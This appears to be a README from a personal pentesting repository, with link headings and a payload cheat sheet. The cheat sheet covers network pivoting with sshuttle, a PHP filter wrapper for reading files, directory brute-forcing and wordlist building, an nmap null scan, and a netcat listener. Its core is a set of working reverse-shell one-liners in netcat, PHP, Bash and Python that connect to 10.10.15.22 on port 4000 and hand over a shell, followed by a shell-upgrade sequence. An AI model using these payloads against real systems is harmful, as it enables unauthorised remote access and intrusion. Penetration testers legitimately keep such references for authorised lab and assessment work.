/Resources

A lot of tools and resources i've gathered for pentesting

Primary LanguagePython

Resources

A collection of links and payloads I stored for quick access

LINKS

Overviews

Windows Pentesting

Microsoft SQL Server

Windows Privillage Escalation

ACTIVE DIRECTORY

Credentials Dumping

Hash Cracking

Log4J

MetaSploit Framework

Payloads

Reverse Engineering

Linux Privillage Escalation

PIVOTING && TUNNELING

Shells

Tools

Payloads

SSHuttle connection

sshuttle -vr balthazar@10.10.110.100 172.16.1.0/24 -x 172.16.1.100

PHP Wrapper

php://filter/convert.base64-encode/resource=

Profiling Password Lists

CEWL

1.DIRECTORY BRUTEFORCING
feroxbuster -eknr --wordlist $HOME/tools/crimson/words/dir -u https://<target_domain>/ -o ferox.txt
2. PREPARE FIRST PART OF THE cewl.txt
cat ferox.txt | grep 200 | grep -v "png\|\.js" | cut -d "h" -f2-100 | sed "s/^/h/g" >> urls.txt
for url in $(cat urls.txt); do echo $url && cewl -d 5 $url >> temp_cewl.txt;done
cat temp_cewl.txt | sort -u >> cewl.txt && rm temp_cewl.txt

Nmap

Null Scan

nmap -n -sN 10.10.110.0/24

Local Webserver

Python

python -m SimpleHTTPServer
python3 -m http.server

PHP

php -S 0.0.0.0:8000

Shells

Set Listener

nc -lnvp 4000

Reverse Shell

netcat:

nc -e /bin/sh 10.10.15.22 4000

PHP:

<?php $sock = fsockopen("ip","port");$proc = proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);?>

Bash

bash -i >& /dev/tcp/10.10.15.22/4000 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Interactive Shell

Bash

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg